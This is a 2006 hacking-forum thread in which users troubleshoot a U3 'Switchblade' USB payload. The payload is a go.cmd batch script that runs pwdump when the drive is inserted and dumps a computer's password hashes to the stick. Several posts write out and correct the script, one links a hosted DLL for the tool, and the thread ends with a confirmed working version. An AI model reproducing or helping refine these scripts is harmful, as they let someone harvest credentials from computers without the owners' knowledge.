Snacks Posted November 14, 2006 Share Posted November 14, 2006 Hi I'm pretty new to the forums and to U3 shenanigans so apologies if this is an overly obvious question. Basically I want my Switchblade to just grab the LM hashes from the computer using pwdump. I've been using the examples in the Switchblade packages page on the wiki, but without success. Oh and I believe I have flashed the drive correctly using MaxDamage's Technique, as other payloads worked. I was hoping someone could point me in the direction of the correct code for the go.cmd, and any other files I will need to grab the hashes. Thanks for your time. Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted November 14, 2006 Share Posted November 14, 2006 Hey, Snascks, could you be more specific please? Such as, what error messages are you getting, what is the current coding structure of your go.cmd, which payload are you using, etc. Quote Link to comment Share on other sites More sharing options...
Snacks Posted November 14, 2006 Author Share Posted November 14, 2006 Sorry, here is a rundown of what I'm using; U3 Sandisk Cruzer micro Max Damage Technique brainkills encrypted pwdump Here is what I have for my go.cmd; @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Quote Link to comment Share on other sites More sharing options...
Jester Posted November 14, 2006 Share Posted November 14, 2006 I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was. There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file http://binaryninja.net/LsaExt.dll Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8) Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted November 14, 2006 Share Posted November 14, 2006 While, it will be detectable to AV's, try using the newest version on PWDump. Quote Link to comment Share on other sites More sharing options...
Snacks Posted November 14, 2006 Author Share Posted November 14, 2006 Thanks for the replies, I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was. There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file http://binaryninja.net/LsaExt.dll Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8) I tried the .dll and had the same problem as before, basically when i insert the drive all that seems to happen is the WIPdumpcomputername folder is made but there are no files in it. While, it will be detectable to AV's, try using the newest version on PWDump. I tried that and got the same problem. Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted November 14, 2006 Share Posted November 14, 2006 Change if not exist WIPdump%computername% md WIPdump%computername% >nulcd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 to if not exist WIPdump%computername.log% md WIPdump%computername%.log >nulcd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Quote Link to comment Share on other sites More sharing options...
Snacks Posted November 14, 2006 Author Share Posted November 14, 2006 Thankyou, I didnt have any luck even after all your help, not sure what the problem was, but i decided to start from scratch and made my own simplified version of 'go.cmd'. For anyone interested i just used the following lines; @echo off pwdump -o %computername%.txt 127.0.0.1 That just dumps the passwords in CMD. Quote Link to comment Share on other sites More sharing options...
Jester Posted November 15, 2006 Share Posted November 15, 2006 @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul Echo ************************************ >> WIPdump%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> WIPdump%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%.log 2>&1 .pwdump 127.0.0.1 >> WIPdump%computername%.log 2>&1 Here is the correct code you need to have you had the output going into the wrong directory. Quote Link to comment Share on other sites More sharing options...
Snacks Posted November 15, 2006 Author Share Posted November 15, 2006 :oops: Thanks Jester! Working perfectly now. :D Quote Link to comment Share on other sites More sharing options...
Jester Posted November 15, 2006 Share Posted November 15, 2006 Great to hear 8) 8) 8) Quote Link to comment Share on other sites More sharing options...
mubix Posted November 15, 2006 Share Posted November 15, 2006 Where can one find updated code at.. I am probably buying a U3 device tonight Quote Link to comment Share on other sites More sharing options...
Jester Posted November 15, 2006 Share Posted November 15, 2006 You can check out the wiki http://www.hak5.org/wiki/Switchblade_Packages Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.